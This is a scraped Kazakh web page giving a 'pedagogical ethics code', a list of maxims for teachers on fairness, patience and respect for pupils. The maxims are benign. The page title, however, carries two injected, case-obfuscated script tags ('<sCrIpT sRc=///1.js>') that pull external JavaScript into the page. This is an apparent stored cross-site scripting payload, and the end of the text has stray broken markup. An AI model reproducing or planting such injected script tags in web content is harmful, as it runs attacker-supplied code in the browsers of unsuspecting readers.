Педагогикалық әдептілік кодексі<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>
20.11.2019
- Мамандығыңмен мақтан – мамандықпен көтерілесің.
- Сыныпқа көтеріңкі көңілмен кір. Бұл сәтті сабақтың бастамасы болмақ.
- Барлық іс-әрекетің балаларға бағытталсын және ол оларға еш зиян келтірмесін.
- Үнемі сақ жүр – ешуақытта берілме.
- Есіңде болсын! Сен шәкіртіңді жақсы көрсең ғана дұрыс түсіне білесің.
- Жазалау – айыптау құралы болмасын, керісінше табысқа жетелесін.
- Ашулансаң – тек қана өзіңе ашулан.
- Қателессең кешірім сұра, бірақ та сирек болсын.
- Үнемі оқушылармен бірге бол, қатар жүр, алдына түс.
- Егер сен өзіңді тәрбиелемесең, жаман мұғалімсің, егер өзіңді ғана тәрбиелесең онда сен мұғалім емессің!
- Айыптау – күнәні бөліскеннен жеңіл.
- Еш уақытта табысты өзің иемденіп, айыпты оқушыларға итерме.
- Шешім қабылдауға асықпа, бірақ кешіктірме!
- Оқушыларға әсер ете алмаған мұғалім – нашар мұғалім.
- Алдымен үйрет, сонан соң талап ет.
- Оқушылардың білімі мен тәртібін бағалауда мейлінше мұқият және әділ бол.
- Ешқашан өз шәкіртің туралы басқаға шағым айтпа.
- Оқушыларды бір-бірімен салыстырма.<
Просмотров: 673